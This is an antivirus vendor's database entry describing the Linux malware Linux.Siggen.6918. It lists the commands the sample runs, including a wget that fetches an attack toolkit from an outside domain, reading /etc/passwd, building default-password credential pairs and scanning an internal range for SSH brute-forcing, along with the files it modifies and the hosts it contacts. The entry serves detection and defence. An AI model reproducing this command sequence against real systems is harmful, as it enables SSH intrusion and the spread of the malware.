Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.Siggen.6918

Added to the Dr.Web virus database: 2024-04-08

Virus description added:

Technical Information

Malicious functions:
Launches processes:
  • chmod +x <SAMPLE> a a_mass ascn.tar haiduc run.sh scan stdout.log stub.sh
  • tr -d .
  • <0x46>
  • grep -oP (?<=inet\x5cs)\x5cd+(.\x5cd+){3}
  • wget -q vvnnmm.com/d/ascn.tar
  • sed -i /\x5cb\x5c(127.0\x5c)\x5cb/d test
  • <SAMPLE_FULL_PATH> -c exec \x27<SAMPLE_FULL_PATH>\x27 \x22$@\x22 <SAMPLE_FULL_PATH>
  • ./scan 172.17.0.0-172.17.255.255 22
  • sed -i /\x5cb\x5c(169.254\x5c)\x5cb/d test
  • cut -d . -f 2
  • grep bash
  • /bin/bash ./a_mass 172 17
  • cut -d . -f 1,2
  • /usr/bin/mawk awk $0=\x22./a_mass \x22$0 ranges
  • ip addr
  • chmod +x <SAMPLE> a a_mass ascn.tar haiduc pass rang ranges run.sh scan start stdout.log stub.sh test two
  • tar xvf ascn.tar
  • cat /etc/passwd
  • /usr/bin/mawk awk -F : {print $1\x22 \x22$1}
  • sort -u rang
  • /usr/bin/mawk awk -F : {print $1\x22 \x22\x22123456\x22}
Performs operations with the file system:
Modifies file access rights:
  • /root/a
  • /root/a_mass
  • /root/haiduc
  • /root/scan
  • <SAMPLE_FULL_PATH>
  • /root/ascn.tar
  • /root/run.sh
  • /root/stub.sh
  • /root/pass
  • /root/rang
  • /root/ranges
  • /root/start
  • /root/test
  • /root/two
Modifies file owner:
  • /root/a
  • /root/a_mass
  • /root/haiduc
  • /root/scan
  • /root/sedkrSpzM
  • /root/sedsx7a1O
Creates or modifies files:
  • /root/ascn.tar
  • /root/a
  • /root/a_mass
  • /root/haiduc
  • /root/scan
  • /root/test
  • /root/two
  • /root/sedkrSpzM
  • /root/sedsx7a1O
  • /root/pass
  • /root/rang
  • /root/ranges
  • /root/start
  • /root/scan22.log
Changes time of creation/access/modification of files:
  • /root/ascn.tar
  • /root/a
  • /root/a_mass
  • /root/haiduc
  • /root/scan
Network activity:
Establishes connection:
  • 8.#.8.8:53
  • 94.###.65.212:80
Attacks using a special dictionary (brute-force technique) via the SSH protocol
DNS ASK:
  • vv##mm.com
Sends data to the following servers:
  • 94.###.65.212:80
Receives data from the following servers:
  • 94.###.65.212:80

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number